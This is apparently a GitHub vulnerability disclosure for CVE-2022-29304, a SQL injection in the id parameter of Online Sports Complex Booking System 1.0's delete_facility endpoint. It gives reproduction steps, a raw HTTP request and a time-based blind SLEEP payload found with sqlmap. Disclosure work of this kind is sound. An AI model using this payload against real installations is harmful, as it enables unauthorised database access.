Headline
CVE-2022-29304: Exploit-/Online Sports Complex Booking System 1.0 SQL Injection(三).md at main · playZG/Exploit-
Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /classes/master.php?f=delete_ Facility.
Title: Online Sports Complex Booking System 1.0 SQL Injection****Author: Zllggggg****Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html****Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip****Tested on: Windows, MySQL, Apache
After the program is installed, enter the background, find the facility list in the right navigation bar, select a piece of data, and click the delete button
According to the submission path /classes/master.php?f=delete_ Facility, Find delete_facility(),The ID parameter does not have any filtering,Therefore, SQL injection is caused
Because the parameters are submitted in post mode,Use burpsuite to intercept and save it as a TXT file,Then use sqlmap to verify sqlmap -r 2.txt
Data packet
POST /scbs/classes/Master.php?f=delete_facility HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 4
Origin: http://localhost
Connection: close
Referer: http://localhost/scbs/admin/?page=facilities
Cookie:PHPSESSID=t261ncguifvbucmfe31v6l74km
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
id=1
Payload
Parameter: id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4984 FROM (SELECT(SLEEP(5)))KDjE) AND 'riWF'='riWF